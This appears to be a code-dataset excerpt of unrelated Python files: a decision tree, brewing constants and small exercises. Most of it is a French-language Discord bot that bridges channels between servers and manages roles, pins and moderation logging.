ndarray\n An array with class labels.\n depth : int\n The maximum depth of the tree.\n\n Returns\n -------\n check : Leaf instance or None\n A Leaf instance is returned if either `y` only contains one class\n label or if the maximum depth of the tree is reached. Otherwise,\n None is returned.\n \"\"\"\n (y_unique, counts) = np.unique(y, return_counts=True)\n\n if len(y_unique) == 1:\n return Leaf(y_unique)\n\n if self.max_depth is None:\n return None\n elif depth >= self.max_depth:\n idx = np.argmax(counts)\n val = y_unique[idx]\n return Leaf(val)\n else:\n return None\n\n def eval_split(self, y_left, y_right):\n \"\"\"Evaluate a candidate split.\n\n y_left : ndarray\n The true target value for one of the two partitions. Should be of\n shape (n_left,).\n y_right : ndarray\n The true target value for one of the two partitions. Should be of\n shape (n_right,).\n\n Returns\n -------\n float\n The value of the impurity measure for the given split.\n \"\"\"\n p_left = np.mean(y_left, keepdims=True)\n p_right = np.mean(y_right, keepdims=True)\n if self.impurity_measure == 'gini':\n c_left = gini(p_left)\n c_right = gini(p_right)\n else:\n c_left = enropy(p_left)\n c_right = enropy(p_right)\n n_left = y_left.shape[0]\n n_right = y_right.shape[0]\n n = n_left + n_right\n return (n_left / n) * c_left + (n_right / n) * c_right\n\n def plot_boundaries(self, X, y):\n plt.figure()\n sns.scatterplot(x=X[:, 0], y=X[:, 1], hue=y, style=y, legend=None)\n\n def plot_node(node):\n if isinstance(node, TreeNode):\n if node.feature == 0:\n plt.axvline(x=node.split_val, color='r')\n else:\n plt.axhline(y=node.split_val, color='r')\n plot_node(node.right_child)\n plot_node(node.left_child)\n\n plot_node(self.root)\n plt.show()\n\n\ndef gini(p):\n return 2 * p * (1 - p)\n\n\ndef enropy(p):\n return - (p * np.log(p) + (1 - p) * np.log(1 - p))\n\n\nclass TreeNode(object):\n \"\"\"\n This implements a node in a tree which is not a leaf. It is used to store\n information about which feature to split and at which value.\n\n Attributes\n ----------\n feature : int\n split_val : float\n left_child : TreeNode instance or Leaf instance\n right_child : TreeNode instance or Leaf instance\n \"\"\"\n def __init__(self, feature, split_val, left_child, right_child):\n self.feature = feature\n self.split_val = split_val\n self.left_child = left_child\n self.right_child = right_child\n\n\nclass Leaf(object):\n \"\"\"Leaf node.\n\n This implements a leaf node in a tree which is used to store predictions.\n\n Attributes\n ----------\n pred : int\n The predicted label for an observation which ends up in this leaf.\n \"\"\"\n def __init__(self, pred):\n self.pred = int(pred)\n","repo_name":"franslarsson/ml-algo","sub_path":"tree_models/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"392729248","text":"from pyspark.sql.dataframe import DataFrame\nfrom dataquality_bnr.dqSupport import main as dqSup\n\ndef getDataframe(spark, inputData):\n print(\"getDataframe...\")\n \n df=None\n \n if type(inputData) == DataFrame:\n df=inputData\n elif type(inputData) == str:\n inputDataYaml = inputData\n df = dqSup.getDataframe(spark, yaml_path=inputDataYaml)\n \n return df","repo_name":"brunoRenzo6/Spark-DataQuality","sub_path":"dataquality-bnr/dataquality_bnr/yamlHandler/inputData.py","file_name":"inputData.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6866090504","text":"gramsperounce\t= 28.349523\ngramsperpound\t= 16 * gramsperounce\nlitersperquart\t= 0.94635295\nliterspergallon\t= 4 * litersperquart\ngallonsperbarrel= 31\n\t\t # tbsp * cup * quart * gallon\ntsppergallon\t= 3 * 16 * 4 * 4\n\t\t # quart * gallon\ncupspergallon\t= 4 * 4\n\npascalsperbar\t= 100000\npascalsperatm\t= 101325\npascalsperpsi\t= 6894.75729\n\nabsolute_zero_c\t= -273.15\n\nebcpersrm\t= 1.97\n\n# g/l of co2 at stp\nco2_stp_gl\t= 1.977\n\n# in case the maltster doesn't report a fine-coarse difference, use 1.5%\nfine_coarse_diff= 1.5\n\n# need this much conversion power in the entire recipe (WK)\nminconversion\t= 94\n\n# hop absorption, milliliter of wort per gram of hops\npellethop_absorption_mlg = 6\nleafhop_absorption_mlg = 10\n\n# specific volume of grains in l/kg.\n#\n# don't remember where I pulled this figure from, so should\n# check accuracy of it some day.\ngrain_specificvolume = 0.7\n\n# hop densities, via http://www.ebc2017.com/inhalt/uploads/P023_Schuell.pdf\n# used for calculating hops volumes to that we know how much wort fits\n# into the keg. frankly, the volume are so small that it doesn't matter\n# that much, but let's do it just to accommodate for the pathological\n# \"500g leaf hops in a 5gal keg\" case.\n#\n# Also, I'm not sure those values are for the density of the *hops*, not\n# the packaging. need to measure for myself. Just use these numbers\n# for now.\n#\n# in kg/m3 (or g/l)\npellethop_density_gl = 500\nleafhop_density_gl = 135\n\ndatefmt=\"%a %d %b %Y\"\n","repo_name":"anttikantee/wbc","sub_path":"WBC/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"19392500528","text":"# Problem to Solve: What if we need the length of the words separated by a space to be added at the end of that same word and have it returned as an array?\n\n# Examples:\n# \"apple ban\" --> [\"apple 5\", \"ban 3\"]\n# \"you will win\" -->[\"you 3\", \"will 4\", \"win 3\"] \n\n# 1. Determine length of each string\n# 2. Add lenth immediately after each string\n\n# Split single string into list of individuals\n# Loop through list counting each individual string's length.\n# concatenate string with its length Inter \n\n\nstr_1 = \"you will win\"\nstr_2 = \"\"\n\ndef add_length(str_):\n \n lslist = []\n split_string = str_.split()\n for x in split_string:\n l = len(x)\n lslist.append(x + ' ' + str(l))\n \n return lslist\n\n\n\n\n\nprint(add_length(str_1))","repo_name":"JACedwards/Code_Wars_Solutions","sub_path":"Add_Length.py","file_name":"Add_Length.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22080687556","text":"import multiprocessing as mp\nimport time\n\ndef f(name):\n count = 0\n while True: \n print('hello ', name, \"count: \", count)\n count += 1\n time.sleep(1)\n\nif __name__ == '__main__':\n p = mp.Process(target=f, args=('bob',))\n p.start()\n print(\"main process going to sleep\")\n time.sleep(5)\n p2 = mp.Process(target=f, args=('paulo',))\n p2.start()\n print(\"main process going to sleep again\")\n time.sleep(5) \n c = 0\n while True:\n print(\"main\")\n time.sleep(1)\n c += 1\n if c == 10:\n print(\"matar processing\")\n p.terminate()\n","repo_name":"ppereiradev/fault-injector","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34487763794","text":"import sys\nimport functions.link_handler as lh\n\ndef main():\n if not sys.argv[1]:\n print(\"Did not get an URL, please give one\")\n exit\n \n url = sys.argv[1]\n \n print(f\"Starting to gather URLS from {url}\")\n\n links = lh.gather_links_from_url(url)\n\nif __name__ == \"__main__\":\n main()","repo_name":"MichaelNirkman/web-mash","sub_path":"webmash.py","file_name":"webmash.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70651874887","text":"import asyncio\nimport nextcord as discord\nimport os\nimport pickle\nimport requests\nimport sys\nfrom nextcord.ext import commands\nfrom random import randint\nfrom time import sleep\nfrom typing import Optional, Union, Dict, Set, Tuple\ntry:\n from open_digraph import *\nexcept ImportError:\n from .open_digraph import *\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# CONSTANTES ###################################################################\nfrom constantes import ADMINS, TOKEN, prefixeBot\nfrom utils import stockePID, cheminOutputs\nChannelID = Tuple[int, int] #tuple qui contient l'id du salon et l'id du serveur\nMessage = int #l'id du message\nclass Groupe(OpenDigraph):\n def __init__(self):\n super().__init__([], [], [])\n self.originaux: Dict[Message, Message] = dict() #associe à une copie le message original\n self.copies: Dict[Message, Set[Message]] = dict() #associe à un original la liste de ses copies\n self.copiesGuild: Dict[Tuple[Message, ChannelID], Message] = dict() #associe à un message son pendant sur un autre salon\n self.auteur: Dict[Message, str] = dict() #associe à un message le pseudo de son auteur\n\n def salonInGroupe(self: 'Groupe', channelId: ChannelID) -> bool:\n return any(x.getLabel() == channelId for x in self.getNodes())\n def addChannel(self: 'Groupe', channelId: ChannelID) -> None:\n autresNodes = self.getNodeIds()\n self.addNode(channelId, autresNodes, autresNodes)\n def remChannel(self: 'Groupe', channelId: ChannelID) -> None:\n for idNode, node in self.nodes.items():\n if node.getLabel() == channelId:\n self.removeNodeById(idNode)\n def getNodeChannel(self: 'Groupe', channelId: ChannelID) -> Optional[Node]:\n for node in self.getNodes():\n if node.getLabel() == channelId:\n return node\n\n def autresSalons(self: 'Groupe', channelId: ChannelID) -> Set[ChannelID]:\n nodeChannel = self.getNodeChannel(channelId)\n return {self.nodes[idChild].getLabel() for idChild in nodeChannel.getChildrenIds()}\n\n def ajoutMsg(self: 'Groupe', idOriginal: Message, idCopie: Message, channelIdOriginal: ChannelID, channelIdCopie: ChannelID, auteur: str) -> None:\n self.originaux[idCopie] = (idOriginal, channelIdOriginal)\n self.copiesGuild[idCopie, channelIdOriginal] = idOriginal\n self.copiesGuild[idOriginal, channelIdCopie] = idCopie\n self.auteur[idOriginal] = auteur\n self.auteur[idCopie] = auteur\n\n if idOriginal not in self.copies:\n self.copies[idOriginal] = {(idCopie, channelIdCopie)}\n else:\n self.copies[idOriginal].add((idCopie, channelIdCopie))\n\n def copiesMessage(self: 'Groupe', idMsg: Message) -> Set[Tuple[Message, ChannelID]]:\n if idMsg in self.copies: #idMsg est un message original, c'est facile de retrouver ses copies\n return self.copies[idMsg]\n else: #idMsg est une copie par le bot, il faut retrouver l'original et les copies de l'original - idMsg\n original = self.originaux[idMsg]\n return {original} | {x for x in self.copies[original] if x[0] != idMsg}\n def copieDansSalon(self: 'Groupe', idMsg: Message, channelId: ChannelID) -> Optional[Message]:\n if (idMsg, channelId) in self.copiesGuild: #ça ne marche que si idMsg est le message original\n return self.copiesGuild[idMsg, channelId]\n else: #sinon, il faut retrouver l'original\n msgOriginal, channelOriginal = self.originaux[idMsg]\n #par construction le truc suivant existe forcément\n return self.copiesGuild[msgOriginal, channelId]\n def auteurMsg(self: 'Groupe', idMsg: Message) -> str:\n return self.auteur[idMsg]\n\nstockePID()\n\n#on récupère les constantes dans le pickle\ncheminPickle = os.path.join(cheminOutputs, \"discordutils.p\")\n\ntry:\n INFOS = dict() if not os.path.exists(cheminPickle) else pickle.load(open(cheminPickle, \"rb\"))\nexcept:\n INFOS = dict()\n\nif True:\n BLANK = \"‎\" * 3\n\n if \"VOCAL_ROLE\" not in INFOS: INFOS[\"VOCAL_ROLE\"] = dict()\n VOCAL_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"AUTO_ROLE\" not in INFOS: INFOS[\"AUTO_ROLE\"] = dict()\n AUTO_ROLE = INFOS[\"VOCAL_ROLE\"]\n\n if \"BIND_NEW\" not in INFOS: INFOS[\"BIND_NEW\"] = dict()\n BIND_NEW = INFOS[\"BIND_NEW\"]\n\n if \"AUTO_ASSO\" not in INFOS: INFOS[\"AUTO_ASSO\"] = dict()\n AUTO_ASSO = INFOS[\"AUTO_ASSO\"]\n\n if \"AUTO_ROLE_CONF\" not in INFOS: INFOS[\"AUTO_ROLE_CONF\"] = dict()\n AUTO_ROLE_CONF = INFOS[\"AUTO_ROLE_CONF\"]\n\n if \"AUTO_PINS\" not in INFOS: INFOS[\"AUTO_PINS\"] = dict()\n AUTO_PINS = INFOS[\"AUTO_PINS\"]\n\n if \"CLOSE\" not in INFOS: INFOS[\"CLOSE\"] = set()\n CLOSE = INFOS[\"CLOSE\"]\n\n if \"MODO\" not in INFOS: INFOS[\"MODO\"] = dict()\n MODO = INFOS[\"MODO\"]\n\ndef save():\n pickle.dump(INFOS, open(cheminPickle, \"wb\"))\n\ndef estAdmin(usrId): return usrId in ADMINS\n\n\n#TRUCS UTILES ##################################################################\ndef resendFile(url, nomFichier):\n cheminSave = os.path.join(cheminOutputs, nomFichier)\n r = requests.get(url)\n with open(cheminSave, \"wb\") as f:\n f.write(r.content)\n\n return discord.File(cheminSave)\n\ndef supprFichier(fichierDiscord):\n chemin = os.path.join(cheminOutputs, fichierDiscord.filename)\n os.remove(chemin)\n################################################################################\n\nasync def dmChannelUser(user):\n if user.dm_channel is None:\n await user.create_dm() #crée le dm channel, et après user.dm_channel est remplacé par l'objet représentant le dm channel\n return user.dm_channel\n\nasync def bind_new_envoi(msg):\n if msg.content.startswith(BLANK) or msg.author.discriminator == \"0000\": return\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n\n if channelId in BIND_NEW:\n if msg.content == \"\" and msg.embeds == [] and msg.attachments == []: return #c'est un message système qu'on ne veut pas transmettre\n\n groupe = BIND_NEW[BIND_NEW[channelId]]\n auteur, texte, files = msg.author, msg.content, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embeds = msg.embeds\n reference = msg.reference\n pseudoAuteur = auteur.nick or auteur.name\n\n embed = None if embeds == [] or auteur.id != bot.user.id else embeds[0]\n affiNom = f\"{pseudoAuteur} ({msg.guild.name if msg.guild else 'DM'})\"\n texteRenvoye = BLANK + \"**@{} :**\\n{}\".format(affiNom, texte)\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n fichiersHere = files()\n\n if reference:\n referenceId = reference.message_id\n pendantRefChannel = groupe.copieDansSalon(referenceId, (channelCibleId, serveurCibleId))\n objRef = discord.MessageReference(message_id = pendantRefChannel, channel_id = channelCibleId)\n\n retransmis = await channel.send(texteRenvoye, reference = objRef, files = fichiersHere, embed = embed)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name=auteur.name)\n if webhook is None:\n webhook = await channel.create_webhook(name = auteur.name)\n\n retransmis = await webhook.send(texte, wait = True, files = fichiersHere, embed = embed, username = affiNom, avatar_url = auteur.avatar.url)\n #retransmis = await channel.send(texteRenvoye, files = fichiersHere, embed = embed)\n\n groupe.ajoutMsg(msg.id, retransmis.id, (channelId, guildId), (channelCibleId, serveurCibleId), pseudoAuteur)\n\n map(supprFichier, fichiersHere)\n sleep(0.4)\n\n if randint(0, 10) == 0: save()\n\nasync def bind_new_edit(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n if msg.author.id == 689536409060900933 or msg.author.discriminator == \"0000\": return #on ne fait rien si le bot modifie son propre message\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n texte, embeds = msg.content, msg.embeds\n pseudoAuteur = groupe.auteurMsg(msg.id)\n\n texteRenvoye = BLANK + \"**@{} ({}) :**\\n{}\".format(pseudoAuteur, msg.guild.name if msg.guild else \"DM\", texte)\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n if echo.reference:\n await echo.edit(content = texteRenvoye)\n else:\n webhook = discord.utils.get((await channel.webhooks()), name = pseudoAuteur)\n if webhook is None:\n webhook = await channel.create_webhook(name = pseudoAuteur)\n\n await webhook.edit_message(echoId, content = texte)\n\nasync def bind_new_del(msg):\n channelId = msg.channel.id\n guildId = msg.guild.id if msg.guild else msg.guild\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n try:\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.delete()\n sleep(0.4)\n except:\n print(\"Mon développeur a triché !\")\n\nasync def bind_new_react_add(reaction, user, bot):\n msg = reaction.message\n channelId = msg.channel.id\n guildId = msg.guild.id\n\n if user.id == 689536409060900933: return #on ne retransmet pas les réactions déjà faites par le bot\n\n if channelId in BIND_NEW:\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(msg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n await echo.add_reaction(reaction.emoji)\n sleep(0.4)\n\nasync def bind_new_react_del(reaction, bot):\n pass\n\nasync def bind_new_pin_event(channel, last_pin):\n channelId = channel.id\n guildId = channel.guild.id\n\n if last_pin and channelId in BIND_NEW: #sinon, c'est qu'on a retiré un pin (et pour le moment on ne fait rien)\n lastPinMsg = (await channel.pins())[0]\n groupe = BIND_NEW[BIND_NEW[channelId]]\n\n for channelCibleId, serveurCibleId in groupe.autresSalons((channelId, guildId)):\n serveur = bot.get_guild(serveurCibleId)\n channel = serveur.get_channel(channelCibleId)\n\n echoId = groupe.copieDansSalon(lastPinMsg.id, (channelCibleId, serveurCibleId))\n echo = await channel.fetch_message(echoId)\n try:\n await echo.pin()\n except:\n print(\"Mon développeur a triché\")\n sleep(0.4)\n\nasync def vocalrole_voicestate(member, before, after):\n channelBefore = before.channel and before.channel.id\n #si before.channel est None, il reste None, sinon on prend directement l'id du channel\n channelAfter = after.channel and after.channel.id\n guild = member.guild\n\n if guild.id in VOCAL_ROLE:\n rolesGuild = VOCAL_ROLE[guild.id]\n\n if channelBefore in rolesGuild and (channelAfter not in rolesGuild or (channelAfter in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n retraitRole = guild.get_role(rolesGuild[channelBefore])\n await member.remove_roles(retraitRole)\n\n if channelAfter in rolesGuild and (channelBefore not in rolesGuild or (channelBefore in rolesGuild and rolesGuild[channelBefore] != rolesGuild[channelAfter])):\n nouvRole = guild.get_role(rolesGuild[channelAfter])\n await member.add_roles(nouvRole)\n\nasync def autorole_react_add(messageId, member, guild, emoji, add = True):\n if (messageId, emoji) in AUTO_ROLE:\n roleId = AUTO_ROLE[messageId, emoji]\n role = guild.get_role(roleId)\n\n if add and role not in member.roles:\n await member.add_roles(role)\n elif not add and role in member.roles:\n await member.remove_roles(role)\n\nasync def autorole_react_del(messageId, member, guild, emoji):\n await autorole_react_add(messageId, member, guild, emoji, False)\n\nasync def autoroleconf_react_add(messageId, member, guild, emoji):\n print(messageId, emoji, (messageId, emoji) in AUTO_ROLE_CONF, len(AUTO_ROLE_CONF))\n if (messageId, emoji) in AUTO_ROLE_CONF:\n roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, toWhoId = AUTO_ROLE_CONF[messageId, emoji]\n role = guild.get_role(roleId)\n\n dm = await dmChannelUser(member)\n\n roleConfirme = toWhoId is not None\n if not roleConfirme:\n if role in member.roles: #si le membre a déjà le rôle, ça vaut comme une confirmation automatique\n roleConfirme = True\n elif serveurAutoId is not None:\n serveurAuto = bot.get_guild(serveurAutoId)\n roleAuto = serveurAuto.get_role(roleAutoId)\n\n try:\n memberAutreServeur = await serveurAuto.fetch_member(member.id)\n except: #le membre n'est pas dans l'autre serveur\n roleConfirme = False\n else:\n roleConfirme = roleAuto in memberAutreServeur.roles\n\n if roleConfirme:\n if toWhoId:\n member = await guild.fetch_member(toWhoId)\n dm = await dmChannelUser(member)\n\n await member.add_roles(role)\n await dm.send(f\"**__Serveur {guild.name}__**\\nC'est bon, ton rôle est confirmé !\")\n\n if toWhoId:\n del AUTO_ROLE_CONF[messageId, emoji]\n save()\n else:\n channelConf = guild.get_channel(channelConfId)\n\n msgConf = await channelConf.send(f\"<@&{pingConfId}> : {member.mention} prétend être du groupe {role.name}. C'est vrai ?\")\n await msgConf.add_reaction(\"👍\")\n\n AUTO_ROLE_CONF[msgConf.id, \"👍\"] = (roleId, channelConfId, pingConfId, serveurAutoId, roleAutoId, member.id)\n\n save()\n\n await dm.send(f\"**__Serveur {guild.name}__**\\nTu as dit être dans le groupe {role.name}, ce sera confirmé par les admins bientôt.\")\n\nasync def autoasso_react_add(messageId, member, guild, emoji):\n messagesVerifies = (813413525560361010, 813413830918406224) #questions entrée\n messageAcces = 820709722860027915\n roleMembreServeurAsso = 811670434315239424\n memberId = member.id\n\n if messageId in messagesVerifies: #on répond à une question du \"qcm\" d'entrée, on enregistre la question à laquelle le membre a répondu\n if memberId in AUTO_ASSO:\n AUTO_ASSO[memberId].add(messageId)\n else:\n AUTO_ASSO[memberId] = {messageId}\n\n save()\n\n elif messageId == messageAcces: #on demande l'accès en acceptant le règlement\n if memberId not in AUTO_ASSO or len(AUTO_ASSO[memberId]) != len(messagesVerifies): #le qcm n'a pas été répondu\n channel = await dmChannelUser(member)\n\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci d'avoir rejoint le serveur ! Pour y avoir accès, svp mettez bien des réactions aux {len(messagesVerifies)} messages au-dessus de celui qui permet d'accepter le règlement, puis remettre la réaction pour accepter le règlement.\\nÀ bientôt !\")\n else: #le qcm a été répondu, on donne l'accès au reste du serveur\n role = guild.get_role(roleMembreServeurAsso)\n await member.add_roles(role)\n await channel.send(f\"**Arrivée sur le serveur de l'API des Passionnés d'Informatique**\\nMerci ! Vous avez maintenant accès au reste du serveur.\")\n\nasync def autopin_react_add(messageId, member, guild, emoji, channel):\n if emoji == \"📌\": #c'est un pin !\n if messageId not in AUTO_PINS:\n AUTO_PINS[messageId] = {member.id}\n else:\n AUTO_PINS[messageId].add(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) == 5: #on a 5 personnes qui demandent un pin, on le fait\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.pin()\n except:\n await channel.send(\"Le bot n'a pas le droit d'épingler des messages ici\")\n\nasync def autopin_react_del(messageId, member, guild, emoji, channel):\n if emoji == \"📌\":\n if messageId in AUTO_PINS:\n AUTO_PINS[messageId].remove(member.id)\n\n save()\n\n if len(AUTO_PINS[messageId]) < 5:\n msg = await channel.fetch_message(messageId)\n\n try:\n await msg.unpin()\n except:\n pass\n\nasync def envoiAutoSuppr(msg, bot):\n if msg.guild and msg.guild.id in MODO and msg.author.id != bot.user.id:\n try:\n channel = await bot.fetch_channel(MODO[msg.guild.id])\n except: #on n'a pas bien récupéré le salon, donc en fait on a 1 id de user, pas de salon\n channel = await bot.fetch_user(MODO[msg.guild.id])\n\n embeds, files = msg.embeds, lambda: [resendFile(x.url, x.filename) for x in msg.attachments]\n embed = None if embeds == [] or msg.author.id != bot.user.id else embeds[0]\n fichierHere = files()\n await channel.send(f\"{str(msg.created_at)} - {str(msg.channel.name)} - {msg.author.nick or msg.author.name} : {msg.content}\", files = fichierHere, embed = embed)\n\nasync def close_envoi(msg):\n channelId = msg.channel.id\n if channelId in CLOSE:\n try:\n await msg.delete()\n except:\n pass\n\ndef main():\n bot = commands.Bot(command_prefix = prefixeBot, help_command = None, intents = discord.Intents.all())\n\n @bot.event #pour ne pas afficher les messages d'erreur de commande inexistante (typiquement si on utilise une commande du bot squadro qui est gérée par un autre script)\n async def on_command_error(ctx, error):\n if isinstance(error, commands.CommandNotFound):\n return\n raise error\n\n @bot.event\n async def on_message_edit(_, msg):\n await bind_new_edit(msg)\n\n @bot.event\n async def on_message_delete(msg):\n await bind_new_del(msg)\n await envoiAutoSuppr(msg, bot)\n\n @bot.event\n async def on_member_join(member):\n bans = []\n for guild in bot.guilds:\n try:\n bans += list(x.user.id for x in (await guild.bans()))\n except: pass\n\n try:\n if member.id in bans:\n await member.ban()\n except:\n pass\n\n async def traitementRawReact(payload):\n if payload.guild_id and payload.user_id != bot.user.id: #sinon, on est dans le cas d'une réaction en dm\n messageId = payload.message_id\n guild = bot.get_guild(payload.guild_id)\n user = await guild.fetch_member(payload.user_id)\n channel = bot.get_channel(payload.channel_id)\n\n partEmoji = payload.emoji\n emojiHash = partEmoji.id if partEmoji.is_custom_emoji() else partEmoji.name\n\n return locals()\n else:\n return None\n\n @bot.event\n async def on_raw_reaction_add(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_add(messageId, user, guild, emojiHash)\n await autoasso_react_add(messageId, user, guild, emojiHash)\n await autoroleconf_react_add(messageId, user, guild, emojiHash)\n await autopin_react_add(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_raw_reaction_remove(payload):\n traitement = await traitementRawReact(payload)\n if traitement:\n messageId = traitement[\"messageId\"]\n user = traitement[\"user\"]\n guild = traitement[\"guild\"]\n emojiHash = traitement[\"emojiHash\"]\n channel = traitement[\"channel\"]\n\n await autorole_react_del(messageId, user, guild, emojiHash)\n await autopin_react_del(messageId, user, guild, emojiHash, channel)\n\n @bot.event\n async def on_reaction_add(reaction, user):\n await bind_new_react_add(reaction, user, bot)\n @bot.event\n async def on_reaction_clear_emoji(reaction):\n await bind_new_react_del(reaction, bot)\n\n @bot.event\n async def on_voice_state_update(member, before, after):\n await vocalrole_voicestate(member, before, after)\n\n\n @bot.event\n async def on_message(msg):\n #liaison de salon\n await bind_new_envoi(msg)\n await bot.process_commands(msg)\n await close_envoi(msg)\n\n @bot.event\n async def on_guild_channel_pins_update(channel, last_pin):\n await bind_new_pin_event(channel, last_pin)\n\n #bind channels\n @bot.command(name = \"utils_bind\")\n async def bind(ctx, salonSource: discord.TextChannel, serveurCible: int, salonCible: int):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n serveurSource = ctx.guild.id\n\n if salonSource in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonSource]\n else:\n cible = set()\n BINDED_CHANNELS[salonSource] = cible\n\n cible.add((serveurCible, salonCible))\n\n if salonCible in BINDED_CHANNELS:\n cible = BINDED_CHANNELS[salonCible]\n else:\n cible = set()\n BINDED_CHANNELS[salonCible] = cible\n\n cible.add((serveurSource, salonSource))\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_unbind\")\n async def unbind(ctx, salonSource: discord.TextChannel):\n if not estAdmin(ctx.author.id): return\n\n salonSource = salonSource.id\n\n if salonSource in BINDED_CHANNELS:\n for (_, channel) in BINDED_CHANNELS[salonSource]:\n BINDED_CHANNELS[channel] = {(x, y) for x, y in BINDED_CHANNELS[channel] if y != salonSource}\n\n BINDED_CHANNELS[salonSource] = set()\n await ctx.message.add_reaction(\"👌\")\n else:\n await ctx.send(\"Ce salon n'était pas relié aux autres\")\n\n save()\n\n #bind new\n @bot.command(name = \"create_bind\")\n async def createBind(ctx):\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n int_to_hex = lambda x: hex(x)[2:]\n idGroupe = int_to_hex(randint(1000000, 9999999))\n BIND_NEW[idGroupe] = Groupe()\n\n await ctx.send(f\"Id du groupe : {idGroupe}. Pour ajouter un nouveau salon, il faut lancer la commande `{prefixeBot}bind {idGroupe}`\")\n\n save()\n\n @bot.command(name = \"bind\")\n async def bindnew(ctx, nomGroupe: str):\n channelId = ctx.channel.id\n guildId = ctx.guild.id if ctx.guild else ctx.guild\n\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW and (channelId not in BIND_NEW or BIND_NEW[channelId] == nomGroupe):\n groupe = BIND_NEW[nomGroupe]\n if groupe.salonInGroupe((channelId, guildId)):\n await ctx.message.add_reaction(\"❔\")\n else:\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n elif nomGroupe in BIND_NEW and channelId in BIND_NEW and BIND_NEW[channelId] != nomGroupe:\n groupeOld = BIND_NEW[BIND_NEW[channelId]]\n groupeOld.remChannel((channelId, guildId))\n\n groupe = BIND_NEW[nomGroupe]\n groupe.addChannel((channelId, guildId))\n BIND_NEW[channelId] = nomGroupe\n\n await ctx.message.add_reaction(\"👌\")\n save()\n else:\n await ctx.message.add_reaction(\"❌\")\n\n @bot.command(name = \"del_bind\")\n async def delBind(ctx, nomGroupe: str):\n if ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW:\n for node in BIND_NEW[nomGroupe].getNodes():\n channelId, guildId = node.getLabel()\n del BIND_NEW[channelId]\n\n del BIND_NEW[nomGroupe]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n else:\n await ctx.message.add_reaction(\"❔\")\n\n #vocal role\n @bot.command(name = \"utils_vocalbind\")\n async def vocalbind(ctx, role: discord.Role, salonVocalId: int):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n\n if guildId not in VOCAL_ROLE:\n VOCAL_ROLE[guildId] = dict()\n\n VOCAL_ROLE[guildId][salonVocalId] = role.id\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_vocalunbind\")\n async def vocalunbind(ctx, role: discord.Role):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n roleId = role.id\n\n if guildId in VOCAL_ROLE:\n if roleId in VOCAL_ROLE[guildId].values():\n for salon in (x for x, y in VOCAL_ROLE.items() if y == roleId):\n del VOCAL_ROLE[guildId][roleId]\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n return\n\n await ctx.send(\"Inutile\")\n\n #autorole\n @bot.command(name = \"utils_autorole\")\n async def autorole(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str]):\n 